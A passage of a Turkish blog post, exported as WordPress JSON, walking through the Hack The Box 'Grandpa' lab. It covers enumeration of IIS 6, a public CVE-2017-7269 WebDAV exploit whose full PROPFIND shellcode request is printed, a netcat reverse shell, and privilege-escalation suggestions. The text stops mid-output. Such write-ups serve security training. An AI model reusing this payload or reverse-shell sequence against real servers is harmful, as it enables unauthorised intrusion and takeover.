{"id":1447,"date":"2021-08-01T14:34:36","date_gmt":"2021-08-01T14:34:36","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1447"},"modified":"2021-08-01T14:34:36","modified_gmt":"2021-08-01T14:34:36","slug":"grandpa","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/01\/grandpa\/","title":{"rendered":"Grandpa"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/13\" title=\"Grandpa\">Grandpa<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/381683fd107da11f1dc916401ae8aee0.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmapAutomator.sh ile ba\u015flayal\u0131m. Hedef makinede sadece 80 portunun a\u00e7\u0131k oldu\u011funu tespit ettim ve \u00fczerinden IIS 6 \u00e7al\u0131\u015f\u0131yor. Bunun \u00fczerine nmap'in verdi\u011fi explotileri ara\u015ft\u0131rmaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">PORT   STATE SERVICE VERSION\n80\/tcp open  http    Microsoft IIS httpd 6.0\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-enum: \n|   \/postinfo.html: Frontpage file or folder\n|   \/_vti_bin\/_vti_aut\/author.dll: Frontpage file or folder\n|   \/_vti_bin\/_vti_aut\/author.exe: Frontpage file or folder\n|   \/_vti_bin\/_vti_adm\/admin.dll: Frontpage file or folder\n|   \/_vti_bin\/_vti_adm\/admin.exe: Frontpage file or folder\n|   \/_vti_bin\/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder\n|   \/_vti_bin\/shtml.dll: Frontpage file or folder\n|_  \/_vti_bin\/shtml.exe: Frontpage file or folder\n| http-frontpage-login: \n|   VULNERABLE:\n|   Frontpage extension anonymous login\n|     State: VULNERABLE\n|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.\n|       \n|     References:\n|_      http:\/\/insecure.org\/sploits\/Microsoft.frontpage.insecurities.html\n|_http-server-header: Microsoft-IIS\/6.0\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n| vulners: \n|   cpe:\/a:microsoft:internet_information_server:6.0: \n|       SSV:92834       10.0    https:\/\/vulners.com\/seebug\/SSV:92834    *EXPLOIT*\n|       SSV:2903        10.0    https:\/\/vulners.com\/seebug\/SSV:2903     *EXPLOIT*\n|       PACKETSTORM:82956       10.0    https:\/\/vulners.com\/packetstorm\/PACKETSTORM:82956       *EXPLOIT*\n|       PACKETSTORM:142471      10.0    https:\/\/vulners.com\/packetstorm\/PACKETSTORM:142471      *EXPLOIT*\n|       PACKETSTORM:142060      10.0    https:\/\/vulners.com\/packetstorm\/PACKETSTORM:142060      *EXPLOIT*\n|       PACKETSTORM:141997      10.0    https:\/\/vulners.com\/packetstorm\/PACKETSTORM:141997      *EXPLOIT*\n|       MSF:EXPLOIT\/WINDOWS\/IIS\/MS01_033_IDQ    10.0    https:\/\/vulners.com\/metasploit\/MSF:EXPLOIT\/WINDOWS\/IIS\/MS01_033_IDQ     *EXPLOIT*\n|       MSF:EXPLOIT\/WINDOWS\/IIS\/IIS_WEBDAV_SCSTORAGEPATHFROMURL 10.0    https:\/\/vulners.com\/metasploit\/MSF:EXPLOIT\/WINDOWS\/IIS\/IIS_WEBDAV_SCSTORAGEPATHFROMURL       *EXPLOIT*\n|       MS01_033        10.0    https:\/\/vulners.com\/canvas\/MS01_033     *EXPLOIT*\n|       IIS6_PROPFIND   10.0    https:\/\/vulners.com\/canvas\/IIS6_PROPFIND        *EXPLOIT*\n|       EDB-ID:41992    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:41992      *EXPLOIT*\n|       EDB-ID:20933    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:20933      *EXPLOIT*\n|       EDB-ID:20932    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:20932      *EXPLOIT*\n|       EDB-ID:20931    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:20931      *EXPLOIT*\n|       EDB-ID:20930    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:20930      *EXPLOIT*\n|       EDB-ID:16472    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:16472      *EXPLOIT*\n|       CVE-2017-7269   10.0    https:\/\/vulners.com\/cve\/CVE-2017-7269\n|       CVE-2008-0075   10.0    https:\/\/vulners.com\/cve\/CVE-2008-0075\n|       CVE-2001-0500   10.0    https:\/\/vulners.com\/cve\/CVE-2001-0500\n|       1337DAY-ID-27757        10.0    https:\/\/vulners.com\/zdt\/1337DAY-ID-27757        *EXPLOIT*\n|       1337DAY-ID-27446        10.0    https:\/\/vulners.com\/zdt\/1337DAY-ID-27446        *EXPLOIT*\n|       SSV:12476       9.3     https:\/\/vulners.com\/seebug\/SSV:12476    *EXPLOIT*\n|       SSV:12175       9.3     https:\/\/vulners.com\/seebug\/SSV:12175    *EXPLOIT*\n|       SAINT:38542AFE78DE33F6BB0AF7E6A3C90956  9.3     https:\/\/vulners.com\/saint\/SAINT:38542AFE78DE33F6BB0AF7E6A3C90956        *EXPLOIT*\n|       PACKETSTORM:94532       9.3     https:\/\/vulners.com\/packetstorm\/PACKETSTORM:94532       *EXPLOIT*\n|       MSF:EXPLOIT\/WINDOWS\/FTP\/MS09_053_FTPD_NLST      9.3     https:\/\/vulners.com\/metasploit\/MSF:EXPLOIT\/WINDOWS\/FTP\/MS09_053_FTPD_NLST       *EXPLOIT*\n|       EDB-ID:9559     9.3     https:\/\/vulners.com\/exploitdb\/EDB-ID:9559       *EXPLOIT*\n|       EDB-ID:9541     9.3     https:\/\/vulners.com\/exploitdb\/EDB-ID:9541       *EXPLOIT*\n|       EDB-ID:16740    9.3     https:\/\/vulners.com\/exploitdb\/EDB-ID:16740      *EXPLOIT*\n|       SAINT:54344E071A068774A374DCE7F7795E80  9.0     https:\/\/vulners.com\/saint\/SAINT:54344E071A068774A374DCE7F7795E80        *EXPLOIT*\n|       SAINT:4EB4CF34422D02BCBF715C4ACFAC8C99  9.0     https:\/\/vulners.com\/saint\/SAINT:4EB4CF34422D02BCBF715C4ACFAC8C99        *EXPLOIT*\n|       IISFTP_NLST     9.0     https:\/\/vulners.com\/canvas\/IISFTP_NLST  *EXPLOIT*\n|       CVE-2009-3023   9.0     https:\/\/vulners.com\/cve\/CVE-2009-3023\n|       CVE-2010-1256   8.5     https:\/\/vulners.com\/cve\/CVE-2010-1256\n|       CVE-2007-0087   7.8     https:\/\/vulners.com\/cve\/CVE-2007-0087\n|       SSV:30067       7.5     https:\/\/vulners.com\/seebug\/SSV:30067    *EXPLOIT*\n|       CVE-2007-2897   7.5     https:\/\/vulners.com\/cve\/CVE-2007-2897\n|       SSV:2902        7.2     https:\/\/vulners.com\/seebug\/SSV:2902     *EXPLOIT*\n|       CVE-2008-0074   7.2     https:\/\/vulners.com\/cve\/CVE-2008-0074\n|       EDB-ID:2056     6.5     https:\/\/vulners.com\/exploitdb\/EDB-ID:2056       *EXPLOIT*\n|       CVE-2006-0026   6.5     https:\/\/vulners.com\/cve\/CVE-2006-0026\n|       EDB-ID:585      5.0     https:\/\/vulners.com\/exploitdb\/EDB-ID:585        *EXPLOIT*\n|       CVE-2005-2678   5.0     https:\/\/vulners.com\/cve\/CVE-2005-2678\n|       CVE-2003-0718   5.0     https:\/\/vulners.com\/cve\/CVE-2003-0718\n|       CVE-2000-0115   5.0     https:\/\/vulners.com\/cve\/CVE-2000-0115\n|       CVE-1999-0229   5.0     https:\/\/vulners.com\/cve\/CVE-1999-0229\n|       SSV:20121       4.3     https:\/\/vulners.com\/seebug\/SSV:20121    *EXPLOIT*\n|       MSF:AUXILIARY\/DOS\/WINDOWS\/HTTP\/MS10_065_II6_ASP_DOS     4.3     https:\/\/vulners.com\/metasploit\/MSF:AUXILIARY\/DOS\/WINDOWS\/HTTP\/MS10_065_II6_ASP_DOS  *EXPLOIT*\n|       EDB-ID:15167    4.3     https:\/\/vulners.com\/exploitdb\/EDB-ID:15167      *EXPLOIT*\n|       CVE-2010-1899   4.3     https:\/\/vulners.com\/cve\/CVE-2010-1899\n|       CVE-2005-2089   4.3     https:\/\/vulners.com\/cve\/CVE-2005-2089\n|       CVE-2003-1582   2.6     https:\/\/vulners.com\/cve\/CVE-2003-1582\n|_      EDB-ID:41738    0.0     https:\/\/vulners.com\/exploitdb\/EDB-ID:41738      *EXPLOIT*\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n<\/code><\/pre>\n<p>Not: Nikto \u00e7\u0131kts\u0131nda PUT, MOVE gibi methodlar\u0131n oldu\u011fu s\u00f6yleniyor ancak san\u0131r\u0131m yazma hakk\u0131m\u0131z yok.<\/p>\n<pre><code class=\"language-sh\">- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP:          10.10.10.14\n+ Target Hostname:    10.10.10.14\n+ Target Port:        80\n+ Start Time:         2021-08-01 08:55:32 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/6.0\n+ Retrieved microsoftofficewebserver header: 5.0_Pub\n+ Retrieved x-powered-by header: ASP.NET\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ Uncommon header &#039;microsoftofficewebserver&#039; found, with contents: 5.0_Pub\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ Retrieved x-aspnet-version header: 1.1.4322\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Retrieved dasl header: &lt;DAV:sql&gt;\n+ Retrieved dav header: 1, 2\n+ Retrieved ms-author-via header: MS-FP\/4.0,DAV\n+ Uncommon header &#039;ms-author-via&#039; found, with contents: MS-FP\/4.0,DAV\n+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH \n+ OSVDB-5646: HTTP method (&#039;Allow&#039; Header): &#039;DELETE&#039; may allow clients to remove files on the web server.\n+ OSVDB-397: HTTP method (&#039;Allow&#039; Header): &#039;PUT&#039; method could allow clients to save files on the web server.\n+ OSVDB-5647: HTTP method (&#039;Allow&#039; Header): &#039;MOVE&#039; may allow clients to change file locations on the web server.\n+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH \n+ OSVDB-5646: HTTP method (&#039;Public&#039; Header): &#039;DELETE&#039; may allow clients to remove files on the web server.\n+ OSVDB-397: HTTP method (&#039;Public&#039; Header): &#039;PUT&#039; method could allow clients to save files on the web server.\n+ OSVDB-5647: HTTP method (&#039;Public&#039; Header): &#039;MOVE&#039; may allow clients to change file locations on the web server.\n+ WebDAV enabled (UNLOCK MKCOL SEARCH COPY PROPPATCH PROPFIND LOCK listed as allowed)\n+ OSVDB-13431: PROPFIND HTTP verb may show the server&#039;s internal IP address: http:\/\/10.10.10.14\/\n+ OSVDB-396: \/_vti_bin\/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe\/aux.htm -- a DoS was not attempted.\n+ OSVDB-3233: \/postinfo.html: Microsoft FrontPage default file found.\n+ OSVDB-3233: \/_vti_inf.html: FrontPage\/SharePoint is installed and reveals its version number (check HTML source for more information).\n+ OSVDB-3500: \/_vti_bin\/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-1999-1376. http:\/\/www.securityfocus.com\/bid\/2252.\n+ OSVDB-67: \/_vti_bin\/shtml.dll\/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.\n+ \/_vti_bin\/_vti_adm\/admin.dll: FrontPage\/SharePoint file found.\n+ 8015 requests: 0 error(s) and 27 item(s) reported on remote host\n+ End Time:           2021-08-01 09:07:18 (GMT-4) (706 seconds)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# davtest -url http:\/\/10.10.10.14\/\n********************************************************\n Testing DAV connection\nOPEN            SUCCEED:                http:\/\/10.10.10.14\n********************************************************\nNOTE    Random string for this session: UWTpRUcWzM\n********************************************************\n Creating directory\nMKCOL           FAIL\n********************************************************\n Sending test files\nPUT     cgi     FAIL\nPUT     asp     FAIL\nPUT     jhtml   FAIL\nPUT     html    FAIL\nPUT     shtml   FAIL\nPUT     php     FAIL\nPUT     aspx    FAIL\nPUT     cfm     FAIL\nPUT     pl      FAIL\nPUT     jsp     FAIL\nPUT     txt     FAIL\n\n********************************************************\n\/usr\/bin\/davtest Summary:\n<\/code><\/pre>\n<p>Bunun \u00fczerine public exploitlere bakmaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# searchsploit SCSTORAGEPATHFROMURL\n--------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                             |  Path\n--------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nMicrosoft IIS - WebDav &#039;ScStoragePathFromUrl&#039; Remote Overflow (Metasploit)                                                 | windows\/remote\/41992.rb\nMicrosoft IIS 6.0 - WebDAV &#039;ScStoragePathFromUrl&#039; Remote Buffer Overflow                                                   | windows\/remote\/41738.py\n--------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n<p><strong>ScStoragePathFromUrl<\/strong> anahter kelimesini tabikide nmap \u00e7\u0131kt\u0131lar\u0131ndan ald\u0131m ve buradaki exploiti kullanmay\u0131 denedim. Ancak shell code'u calc.exe \u00e7al\u0131\u015ft\u0131rmaya y\u00f6nelik yaz\u0131lm\u0131\u015f. Makineyi \u00e7\u00f6zd\u00fckten sonrada kontrol ettim ger\u00e7ekten \u00e7al\u0131\u015f\u0131yor ancak bize reverse laz\u0131m. Bunun \u00fczerine ayn\u0131 anahtar kelimeyle google'da aramalar yapmaya devam ettim ve a\u015fa\u011f\u0131daki linki buldum.<br \/>\n<a href=\"https:\/\/github.com\/kudayDOTsite\/iis6-exploit-2017-CVE-2017-7269\">https:\/\/github.com\/kudayDOTsite\/iis6-exploit-2017-CVE-2017-7269<\/a><\/p>\n<p>Burdaki exploiti kulland\u0131\u011f\u0131mda reverse alabildim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa]\n\u2514\u2500# python2 test.py 10.10.10.14 80 10.10.14.9 4444                                                                                                       1 \u2a2f\nPROPFIND \/ HTTP\/1.1\nHost: localhost\nContent-Length: 1744\nIf: &lt;http:\/\/localhost\/aaaaaaa\u6f68\u7863\u7761\u7133\u6936\u4772\u7a39\u4b77\u4f70\u7553\u7a4f\u4868\u5663\u6d54\u6845\u3953\u506c\u5567\u6763\u3364\u4630\u7845\u6952\u5431\u4c58\u6a51\u7241\u4231\u7035\u5850\u3664\u6c47\u3539\u546a\u5034\u5443\u7752\u5061\u3232\u6d4b\u6c34\u3247\u6241\u374d\u5161\u5862\u4773\u5250\u3670\u7544\u686a\u3374\u4e4a\u786b\u4976\u4e73\u4c6a\u577a\u6f71\u584a\u3230\u376e\u4b49\u524d\u4863\u6f4c\u7556\u7575\u666f\u7668\u444d\u5070\u7a36\u624b\u6557\u7550\u6a72\u7a6b\u7762\u7658\u6248\u6531\u3054\u6c79\u504a\u5462\u5033\u3577\u6a77\u4144\u3334\u6476\u4d46\u5654\u476c\u6543\u7632\u7278\u5769\u4338\u6272\u5a30\u5938\u5448\u0202\u0202\u12c0\u6803\u6c44\u5256\u4b37\u6c6d\u4f58\u585a\u7950\u496a\u584f\u4a52\u4150\u664d\u13c0\u6803\u4834\u6531\u6f43\u6e66\u7441\u436c\u13c0\u6803\u5343\u6a41\u7052\u3330\u5866\u424c\u704b\u6346\u5173\u7941\u7a50\u4a6c&gt; (Not &lt;locktoken:write1&gt;) &lt;http:\/\/localhost\/bbbbbbb\u7948\u6175\u4f43\u6f67\u6b6f\u4845\u3646\u6775\u4433\u3871\u5765\u5a62\u5435\u5661\u6952\u6a53\u5157\u384e\u5948\u6355\u4971\u4364\u6472\u3468\u4758\u7179\u336b\u6b55\u6d48\u504f\u7a46\u3471\u6f54\u7443\u5956\u6f6f\u7341\u3457\u6168\u7a72\u3745\u4d49\u574e\u5448\u4c38\u367a\u3572\u6266\u6e43\u486d\u3548\u6177\u4d5a\u6174\u4133\u4365\u5272\u6d69\u3671\u4e64\u6e39\u6353\u6b64\u5146\u4f30\u786f\u7253\u6750\u4553\u7a63\u7139\u4f53\u4456\u6f36\u7379\u6877\u7a56\u614a\u3945\u3639\u6c39\u4531\u3472\u5365\u584a\u444e\u7a44\u6c35\u5a56\u6241\u6e72\u6631\u5959\u5433\u3142\u5865\u5941\u7150\u3036\u5777\u4457\u5361\u13c0\u6803\u6e4f\u6800\u6e4f\u6800\u4247\u766a\u13c0\u6803\u4257\u4f74\u5947\u5234\u4b66\u4b42\u7464\u786f\u6082\u6801\u5135\u727a\u747a\u4d47\u4459\u5757\ub113\u6800\u3176\u6e6f\u24e3\u6801\u1460\u6803\u7ffe\uffff\uffff\u13c0\u6803\u046e\u6803\u716e\u7470\u1434\u6803\u29e7\u6801\u9391\u6800\u3931\u666e\u4955\u3052\u546b\u766b\u724a\u7961\u141c\u6803\u6e05\u6800\u7732\u7968\u4d69\u366c\u4468\u4d70\u8246\u6800\u4877\u3253\u1daa\u6802\u6f6a\u4335\u13f8\u6803\u29e7\u6801VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A&gt;\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 4444                                                                                                                                         1 \u2a2f\nlistening on [any] 4444 ...\n10.10.10.14: inverse host lookup failed: Unknown host\nconnect to [10.10.14.9] from (UNKNOWN) [10.10.10.14] 1032\nMicrosoft Windows [Version 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nc:\\windows\\system32\\inetsrv&gt;<\/code><\/pre>\n<p>Hemen tabikide <strong>systeminfo<\/strong> dosyas\u0131na ko\u015ftum.<\/p>\n<pre><code class=\"language-sh\">c:\\windows\\system32\\inetsrv&gt;cmd.exe \/c systeminfo \ncmd.exe \/c systeminfo \n\nHost Name:                 GRANPA\nOS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition\nOS Version:                5.2.3790 Service Pack 2 Build 3790\nOS Manufacturer:           Microsoft Corporation\nOS Configuration:          Standalone Server\nOS Build Type:             Uniprocessor Free\nRegistered Owner:          HTB\nRegistered Organization:   HTB\nProduct ID:                69712-296-0024942-44782\nOriginal Install Date:     4\/12\/2017, 5:07:40 PM\nSystem Up Time:            0 Days, 0 Hours, 25 Minutes, 6 Seconds\nSystem Manufacturer:       VMware, Inc.\nSystem Model:              VMware Virtual Platform\nSystem Type:               X86-based PC\nProcessor(s):              1 Processor(s) Installed.\n                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz\nBIOS Version:              INTEL  - 6040000\nWindows Directory:         C:\\WINDOWS\nSystem Directory:          C:\\WINDOWS\\system32\nBoot Device:               \\Device\\HarddiskVolume1\nSystem Locale:             en-us;English (United States)\nInput Locale:              en-us;English (United States)\nTime Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk\nTotal Physical Memory:     1,023 MB\nAvailable Physical Memory: 722 MB\nPage File: Max Size:       2,470 MB\nPage File: Available:      2,258 MB\nPage File: In Use:         212 MB\nPage File Location(s):     C:\\pagefile.sys\nDomain:                    HTB\nLogon Server:              N\/A\nHotfix(s):                 1 Hotfix(s) Installed.\n                           [01]: Q147222\nNetwork Card(s):           N\/A\n<\/code><\/pre>\n<p>\u015eu ana kadarki makina \u00e7\u00f6z\u00fcmlerinde 2003 Serverlarda s\u00fcrekli olarak \u00e7al\u0131\u015fan <strong>Token Kidnapping Local Privilege Escalation<\/strong> var ama onu en son deneyece\u011fim.<\/p>\n<p>Windows Exploit Suggester ile b\u00fct\u00fcn ihtimalleri denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa]\n\u2514\u2500# python2 \/root\/tool\/Windows-Exploit-Suggester\/windows-exploit-suggester.py -d \/root\/tool\/Windows-Exploit-Suggester\/2021-08-01-mssb.xls -i systeminfo| tee systeminfoResult\n[*] initiating winsploit version 3.3...\n[*] database file detected as xls or xlsx based on extension\n[*] attempting to read from the systeminfo input file\n[+] systeminfo input file read successfully (ascii)\n[*] querying database file for potential vulnerabilities\n[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits\n[*] there are now 356 remaining vulns\n[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin\n[+] windows version identified as &#039;Windows 2003 SP2 32-bit&#039;\n[*] \n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\n[*]   https:\/\/github.com\/hfiref0x\/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37367\/ -- Windows ClientCopyImage Win32k Exploit, MSF\n[*] \n[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37098\/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC\n[*] \n[E] MS14-070: Vulnerability in TCP\/IP Could Allow Elevation of Privilege (2989935) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35936\/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC\n[*] \n[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35474\/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC\n[*] \n[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/37800\/\/ -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35308\/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution \/ Powershell VirtualAlloc (MS14-064), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35229\/ -- Internet Explorer &lt;= 11 - OLE Automation Array Remote Code Execution (#1), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35230\/ -- Internet Explorer &lt; 11 - OLE Automation Array Remote Code Execution (MSF), MSF\n[*]   http:\/\/www.exploit-db.com\/exploits\/35235\/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF\n[*]   http:\/\/www.exploit-db.com\/exploits\/35236\/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF\n[*] \n[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/34112\/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34982\/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation\n[*] \n[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35101\/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF\n[*] \n[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/39525\/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39446\/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC\n[*] \n[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical\n[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/34458\/\n[*] \n[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35280\/, -- .NET Remoting Services Remote Command Execution, PoC\n[*] \n[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical\n[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important\n[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\n[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical\n[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\n[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical\n[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important\n[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical\n[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical\n[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical\n[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical\n[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical\n[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35273\/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5., PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34815\/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5.0 Bypass (MS12-037), PoC\n[*] \n[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical\n[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\n[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical\n[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical\n[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical\n[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important\n[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important\n[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important\n[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical\n[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical\n[M] MS08-078: Security Update for Internet Explorer (960714) - Critical\n[*] done\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/htb\/Windows\/Grandpa]\n\u2514\u2500# cat systeminfoResult | grep Privilege\n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\n[*]   https:\/\/github.com\/hfiref0x\/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37098\/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC\n[E] MS14-070: Vulnerability in TCP\/IP Could Allow Elevation of Privilege (2989935) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35936\/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC\n[E] MS14-068: Vulnerability in Kerberos Could Allow 